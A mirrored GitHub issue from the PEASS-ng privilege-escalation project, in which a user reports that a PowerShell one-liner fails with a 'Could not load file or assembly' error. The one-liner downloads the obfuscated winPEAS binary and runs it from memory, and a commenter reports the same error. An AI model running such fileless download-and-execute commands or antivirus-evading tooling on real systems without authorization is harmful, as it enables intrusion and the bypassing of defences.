Giters

peass-ng / PEASS-ng

PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

Home Page:https://book.hacktricks.xyz

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Could not load file or assembly with One liner to download and execute winPEASany from memory in a PS shell?

BrainMarine opened this issue · comments

commented

Issue description

Issue with One liner to download and execute winPEASany from memory in a PS shell.

Steps to reproduce the issue

  1. PS C:\Users\BrainMarine> $url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
  2. PS C:\Users\BrainMarine> $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

Exception calling "Load" with "1" argument(s): "Could not load file or assembly '2235392 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."

Which parameters did you use for executing the script and how did you execute it?

image

If winpeas, did you use a clean or obfuscated winpeas, and for which architecture?

I used the obfuscated version online at https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe

Is there any AV / Threat protection in the system?

Yes but i run it in a whitelisted folder

Please, indicate the OS, the OS version, and the kernel version (build number in case of Windows)

image

Please, indicate the check that is failing and add a screenshot showing the problem

Please see screenshot posted above

How did you expect it to work?

Was expecting to work but I got an error.

Exception calling "Load" with "1" argument(s): "Could not load file or assembly '2235392 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."

Additional details / screenshot

image

commented

@BrainMarine , I have this quite a lot. Not on all machines, but it happens quite frequently. I've checked and .NET is present, even tried to recompile using the most up-to-date framework version available on the machine.

Have you figured out what causes this? I've been playing around with any,x64 and x86 but that doesn't seem to matter.